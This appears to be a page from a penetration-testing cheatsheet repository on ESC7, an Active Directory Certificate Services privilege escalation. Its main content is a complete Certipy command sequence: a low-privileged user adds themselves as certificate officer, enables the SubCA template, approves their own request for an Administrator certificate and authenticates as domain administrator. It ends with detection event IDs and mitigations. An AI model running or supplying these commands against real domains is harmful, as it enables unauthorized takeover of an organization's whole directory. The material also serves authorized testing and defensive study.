daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-32-esc7-vulnerable-ca-officer-permissions.md (4830B)


      1 ---
      2 title: "Attack #32 β€” ESC7 Vulnerable CA Officer Permissions"
      3 description: "ESC7 exploits overly permissive CA permissions. If a low-privileged user has ManageCA rights on the Certificate Authority, they can grant themselves…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "privilege-escalation"]
      7 tools: ["Certipy"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/🟒 Attack #32 β€” ESC7 Vulnerable CA Officer Permissions.md"
     11 ---
     12 # 🟒 Attack #32 β€” ESC7: Vulnerable CA Officer Permissions
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 ESC7 exploits **overly permissive CA permissions**. If a low-privileged user has **ManageCA** rights on the Certificate Authority, they can grant themselves **ManageCertificates** (Certificate Officer) rights, then approve their own failed/pending certificate requests β€” including requests for the SubCA template, which grants full CA-level authority.
     19 
     20 ### Two Sub-Variants
     21 
     22 | Variant | Permission | Exploitation |
     23 |---|---|---|
     24 | **ESC7a** | ManageCA | Self-grant ManageCertificates β†’ approve own requests |
     25 | **ESC7b** | ManageCertificates | Directly approve pending/failed requests |
     26 
     27 ### Attack Flow (ESC7a β€” ManageCA)
     28 
     29 ```
     30 1. Have ManageCA permission on the CA
     31 2. Grant yourself ManageCertificates via CERTSRV.MSC or Certipy
     32 3. Enable the SubCA template (if not already enabled)
     33 4. Request a certificate using the SubCA template (will fail initially)
     34 5. Use ManageCertificates to approve the failed request
     35 6. Retrieve the issued certificate
     36 7. Authenticate as any user
     37 ```
     38 
     39 ***
     40 
     41 ## βš™οΈ Prerequisites
     42 
     43 | Requirement | Detail |
     44 |---|---|
     45 | **ManageCA or ManageCertificates on CA** | Check CA permissions |
     46 | **Domain user account** | Principal with overly permissive CA rights |
     47 
     48 ***
     49 
     50 ## πŸ’» Full Commands
     51 
     52 ### πŸ”΄ ESC7a β€” ManageCA β†’ ManageCertificates β†’ SubCA
     53 
     54 ```bash
     55 # ── Step 1: Add yourself as officer (grant ManageCertificates) ────────────────
     56 certipy ca -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     57   -add-officer low_user -dc-ip 10.10.10.10
     58 
     59 # ── Step 2: Enable SubCA template ────────────────────────────────────────────
     60 certipy ca -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     61   -enable-template SubCA -dc-ip 10.10.10.10
     62 
     63 # ── Step 3: Request SubCA certificate (will fail β€” needs approval) ───────────
     64 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     65   -template SubCA -upn Administrator@corp.local -dc-ip 10.10.10.10
     66 # Note the Request ID from the output (e.g., Request ID: 42)
     67 
     68 # ── Step 4: Approve the failed request (using ManageCertificates) ────────────
     69 certipy ca -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     70   -issue-request 42 -dc-ip 10.10.10.10
     71 
     72 # ── Step 5: Retrieve the issued certificate ───────────────────────────────────
     73 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     74   -retrieve 42 -dc-ip 10.10.10.10
     75 
     76 # ── Step 6: Authenticate ──────────────────────────────────────────────────────
     77 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
     78 ```
     79 
     80 ### πŸ”΄ ESC7b β€” ManageCertificates Direct
     81 
     82 ```bash
     83 # ── If you already have ManageCertificates, skip the officer step ─────────────
     84 # Request + approve flow is the same as steps 3-6 above
     85 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     86   -template SubCA -upn Administrator@corp.local -dc-ip 10.10.10.10
     87 
     88 certipy ca -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     89   -issue-request <ID> -dc-ip 10.10.10.10
     90 
     91 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     92   -retrieve <ID> -dc-ip 10.10.10.10
     93 
     94 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
     95 ```
     96 
     97 ***
     98 
     99 ## πŸ›‘οΈ Detection β€” Event IDs
    100 
    101 | Event ID | Source | What to Look For |
    102 |---|---|---|
    103 | **4890** | Security Log (CA) | CA security settings changed (officer added) |
    104 | **4886** | Security Log (CA) | Certificate request for SubCA template |
    105 | **4887** | Security Log (CA) | Certificate issued after manual approval |
    106 
    107 ***
    108 
    109 ## πŸ”— Attack Chain Context
    110 
    111 ```
    112 [ESC7] ──→ CA permissions abuse β†’ approve own requests β†’ domain compromise
    113          β”‚
    114          β”œβ”€β”€β†’ πŸ”‘ ManageCA β†’ self-grant ManageCertificates β†’ approve SubCA requests
    115          β”œβ”€β”€β†’ πŸ”— SubCA cert = full CA authority
    116          └──→ πŸ’€ Defeated by: restrict ManageCA/ManageCertificates, audit CA permissions
    117 ```
    118 
    119 ***
    120 
    121 > βœ… **Attack #32 β€” ESC7 complete.**